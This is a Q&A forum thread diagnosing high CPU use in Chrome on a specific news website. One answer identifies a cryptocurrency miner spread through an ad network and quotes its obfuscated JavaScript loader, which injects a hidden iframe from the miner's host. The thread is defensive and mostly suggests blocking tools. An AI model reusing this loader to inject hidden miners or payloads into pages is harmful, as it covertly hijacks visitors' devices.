Chrome uses 80% CPU when I visit a specific website

85

18

Whenever I try to visit this particular website, Chrome CPU usage shoots up to at least 75% and my laptop gets way louder. If I close the tab everything goes back to normal.

Windows Task Manager CPU usage

Chrome Task Manager CPU Usage

RAM usage never goes up. My naive guess is the website is trying to mine cryptocurrency. But this happens only if I use Chrome; Edge works normally when I visit this website. The website in question is www.123telugu.com. What could be the reason for this behavior?

Rohith Reddy

Posted 2018-03-10T18:30:07.560

Reputation: 753

I'm using Chrome and my CPU usage doesn't change on the site. I'm guessing the issue is local to your PC, not the site. – Keltari – 2018-03-10T18:34:27.763

Yeah, that was my second guess. What could be the issue here? – Rohith Reddy – 2018-03-10T18:36:16.750

12

Being a risky fellow, I visited that site with Firefox. That specific tab kicked my CPU to 65% instantly, which is almost how quickly I closed the tab. – fred_dot_u – 2018-03-10T18:50:04.123

What happens if I click those links? It borrows my computer for a bit, or now I have malware? – Mazura – 2018-03-11T00:06:41.167

about the cryptocurrency miner...in a comment to another SE posting someone was making a similar claim regarding weather.com

– coderworks – 2018-03-11T02:47:45.903

You can test if it's a miner with https://github.com/stevespringett/disable-webassembly

– Vadzim – 2018-03-11T21:24:45.740

2

I went to that site and the same happened so it's probably a crypto miner – Suici Doga – 2018-03-12T03:56:16.160

14

"Is it a cryptocurrency miner?" It's always a crypto miner. – Ian Kemp – 2018-03-12T05:40:41.873

1

Free advert to visit the site :) – Rui F Ribeiro – 2018-03-12T19:50:15.917

Answers

116

Yes, it’s a cryptocurrency miner. Hosted at www.datasecu.download, implemented in WebAssembly, communicating with its host via WebSocket.

It’s distributed using a compromised advertising network:

Extract from https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js

var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);

tl;dr: Use an Adblocker already.

Daniel B

Posted 2018-03-10T18:30:07.560

Reputation: 40 502
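The extract quoted in the answer above hides its strings in a table that is rotated by a fixed count and read back through an accessor function. The following added example (not part of the original answer) decodes that extract statically in Node.js without evaluating it; the name `decodeLoader` and its regex heuristics are assumptions that fit this one sample.

```javascript
// Added example: static decoder for the loader extract quoted in the answer.
// SAMPLE is that extract, handled purely as text; nothing in it is run or fetched.
const SAMPLE =
  'var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html",' +
  '"head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];' +
  '!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);' +
  'var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};' +
  'a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",' +
  '_0x5028("0x3")),a.style.width="0px",a.style.height="1px",' +
  'document[_0x5028("0x4")][_0x5028("0x5")](a);';

function decodeLoader(src) {
  // 1. String table: `var NAME=[...]` containing only double-quoted literals.
  const tab = /var\s+(_0x[0-9a-f]+)\s*=\s*(\[(?:"[^"]*",?)*\])/.exec(src);
  if (!tab) throw new Error('no string table found');
  const [, tableName, literal] = tab;
  const strings = JSON.parse(literal);

  // 2. Shuffle: IIFE called as (NAME, N). After ++x, for(;--x;) runs N times,
  //    each pass doing push(shift()), so the table is rotated left by N.
  const rot = new RegExp('\\(' + tableName + ',\\s*(\\d+)\\)').exec(src);
  const n = rot ? Number(rot[1]) % strings.length : 0;
  const table = strings.slice(n).concat(strings.slice(0, n));

  // 3. Accessor: the function whose body indexes the table.
  const acc = new RegExp('var\\s+(_0x[0-9a-f]+)\\s*=\\s*function[^{]*\\{[^}]*' +
    tableName + '\\[').exec(src);
  if (!acc) throw new Error('no accessor function found');

  // 4. Substitute accessor("0xN") calls in the code that follows the accessor.
  const used = new Set();
  const body = src.slice(src.indexOf('};', acc.index) + 2);
  const calls = new RegExp(acc[1] + '\\("(0x[0-9a-f]+)"\\)', 'g');
  const code = body
    .replace(calls, (_, hex) => {
      const i = Number(hex);
      used.add(i);
      return i < table.length ? JSON.stringify(table[i]) : '/* out of range */';
    })
    .replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1'); // obj["name"] -> obj.name

  return {
    code,
    hosts: table.filter(s => /^https?:\/\//.test(s)).map(u => new URL(u).hostname),
    unreferenced: table.filter((_, i) => !used.has(i)),
  };
}

console.log(decodeLoader(SAMPLE));
```

The decoded statement is a 0px by 1px iframe whose `src` is the host named in the answer, which gives the domain to put in a filter list.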

3

Hmm. uBlock Origin doesn't stop it (on Firefox at least). – DavidPostill – 2018-03-10T20:31:07.790

5

VirusTotal comes back clean. Does no one classify crypto currency miners on websites as malicious? – Ploni – 2018-03-11T01:48:45.963

heh, that ad network might not even be "compromised", except intentionally. – coderworks – 2018-03-11T02:49:44.503

7

@Ploni there are some cases where their use isn't malicious and actually legitimate – Keith M – 2018-03-11T03:32:04.650

1

ABP doesn't appear to block it either. – Matthew FitzGerald-Chamberlain – 2018-03-11T03:44:53.913

In the meanwhile, try https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl

– Madara's Ghost – 2018-03-11T09:51:36.090

@DanielB: I need to set both "third-party scripts" and "third-party frames" to neutral for the adware/malware to work. I have them blocked by default. – David Foerster – 2018-03-11T10:05:26.653

@DavidFoerster Those are certainly sensible choices. However, this isn’t the default configuration, leaving many users vulnerable. That’s why it has to be in the default block lists. – Daniel B – 2018-03-11T12:02:13.387

4

I just added www.datasecu.download to my adblock filters and it blocks it now. Thanks. – Rohith Reddy – 2018-03-11T20:23:03.037

Semi-deobfuscated version available at https://pastebin.com/6Ys3ihkJ (in a Pastebin because it was otherwise too long)

– Solomon Ucko – 2018-03-11T21:15:59.563

5

@RonJohn I'd argue that cryptocurrency malware isn't that bad, at least compared to getting Forbes'd. I'd rather have my CPU overused for a couple of minutes than malware installed on my computer. Not at all coincidentally, both are prevented by (a) having a strict adblocker and (b) refusing to make exceptions.

– Fund Monica's Lawsuit – 2018-03-12T06:09:17.950

4

@Ploni Crypto miners are no more malicious than your printed newspaper ad. One taps processing power of your CPU, the other taps processing power of your brain, both do it for the financial gain of its operator. You can close both by closing the page, therefore: "not malicious." – Agent_L – 2018-03-12T09:03:54.987

1

Do keep in mind that comments are not for extended discussion. You might want to take the question of whether crypto mining in ads is malicious to [chat]. – Daniel B – 2018-03-12T09:11:10.460

2

@Agent_L that's debatable, what if someone knew how to access and use your brain without you knowing about it. At least you'd like to know what they are doing. In this case, no warning whatsoever was provided. – CPHPython – 2018-03-12T15:19:22.920

8

For uBlock you can load the noCoin filter list: https://github.com/hoshsadiq/adblock-nocoin-list/

This datasecu website is already included.

jho

Posted 2018-03-10T18:30:07.560

Reputation: 91

1

Just disable JavaScript and the website won't be able to use your PC's CPU. If you use Chrome: right click -> inspect element -> network (tab) -> settings -> disable JavaScript.

Sebastian Nielsen

Posted 2018-03-10T18:30:07.560

Reputation: 133